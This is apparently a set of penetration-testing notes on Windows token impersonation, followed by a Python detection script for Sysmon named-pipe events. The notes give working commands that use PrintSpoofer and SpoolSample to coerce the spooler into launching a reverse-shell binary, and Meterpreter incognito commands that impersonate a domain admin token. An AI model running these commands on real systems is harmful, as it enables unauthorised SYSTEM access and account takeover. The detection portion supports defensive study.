Service Account Access Token

SeImpersonatePrivilege

When no tokens belonging to other user accounts are available in memory, we can usually coerce a SYSTEM process into connecting to a named pipe we control. SeImpersonatePrivilege lets us impersonate any client that connects to that pipe, so the SYSTEM connection hands us a SYSTEM token.

Assigned by default to:

  • built-in Network Service account

  • LocalService account

  • default IIS account

whoami /priv                  # confirm SeImpersonatePrivilege is present
cmd /c sc query spooler       # confirm the Print Spooler service is running

Notes:

  • may need reflective load

  • SpoolSample: works for Network Service only; works on Windows client only (not Server)

# on the compromised web server, create the pipe locally and serve shell.exe (reverse shell) to whoever connects
.\PrintSpoofer.exe \\.\pipe\test\pipe\spoolss c:\temp\shell.exe

# make the spooler call back to the locally created pipe, which triggers shell.exe
.\SpoolSample.exe webself01 webself01/pipe/test
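A detection-side counterpart to the abuse above, added here as an example (not from the original notes, nor from PrintSpoofer or SpoolSample): it correlates Sysmon-style pipe events (Event ID 17 pipe created, Event ID 18 pipe connected) to flag a spooler pipe name created by the wrong process and then connected to by spoolsv.exe. The sample events and their field names are constructed and simplified, not real Sysmon output.

```python
# Sysmon logs named-pipe creation as Event ID 17 and pipe connection as
# Event ID 18.  The abuse above has a distinctive shape: a low-privileged
# service account creates a pipe whose path merely ENDS in a real service
# pipe name (\test\pipe\spoolss), then the real service (spoolsv.exe as
# SYSTEM) is coerced into connecting to that pipe.

# Service pipe names and the only image that should legitimately create them.
SERVICE_PIPE_OWNERS = {"spoolss": "spoolsv.exe"}

# Constructed, simplified pipe events (shape only loosely modelled on Sysmon).
SAMPLE_EVENTS = [
    {"EventID": 17, "Image": r"C:\Windows\System32\spoolsv.exe",
     "User": r"NT AUTHORITY\SYSTEM", "PipeName": r"\spoolss"},
    {"EventID": 17, "Image": r"C:\temp\PrintSpoofer.exe",
     "User": r"IIS APPPOOL\DefaultAppPool", "PipeName": r"\test\pipe\spoolss"},
    {"EventID": 18, "Image": r"C:\Windows\System32\spoolsv.exe",
     "User": r"NT AUTHORITY\SYSTEM", "PipeName": r"\test\pipe\spoolss"},
    {"EventID": 18, "Image": r"C:\Windows\System32\svchost.exe",
     "User": r"NT AUTHORITY\SYSTEM", "PipeName": r"\spoolss"},
]


def _basename(path):
    """Last backslash-separated component, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Return alert strings for (1) a service pipe name created by the wrong
    image or nested under another pipe path, and (2) the owning service
    connecting to a pipe that a different process created."""
    alerts = []
    creators = {}  # pipe name -> image that created it (from Event ID 17)
    for ev in events:
        name, image = ev["PipeName"], _basename(ev["Image"])
        owner = SERVICE_PIPE_OWNERS.get(_basename(name))
        if ev["EventID"] == 17:
            creators[name.lower()] = image
            if owner and (image != owner or "\\pipe\\" in name.lower()):
                alerts.append(f"spoofed service pipe {name} created by "
                              f"{image} running as {ev['User']}")
        elif ev["EventID"] == 18 and owner and image == owner:
            creator = creators.get(name.lower())
            if creator is not None and creator != owner:
                alerts.append(f"{owner} connected to pipe {name} "
                              f"created by {creator}")
    return alerts


if __name__ == "__main__":
    for line in analyze(SAMPLE_EVENTS):
        print("ALERT:", line)
```

The first rule fires on the pipe creation alone; the second needs the creation event to be in the same window, so pipes created before logging started are not alerted on by it.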

Meterpreter

With a SYSTEM shell (obtained via the pipe technique above, or via getsystem below), the incognito extension can impersonate any logged-in user and obtain code execution in their context without access to any passwords or hashes.

meterpreter > getsystem
meterpreter > load incognito
meterpreter > help incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token corp1\\admin
meterpreter > getuid                         # confirm the impersonated identity
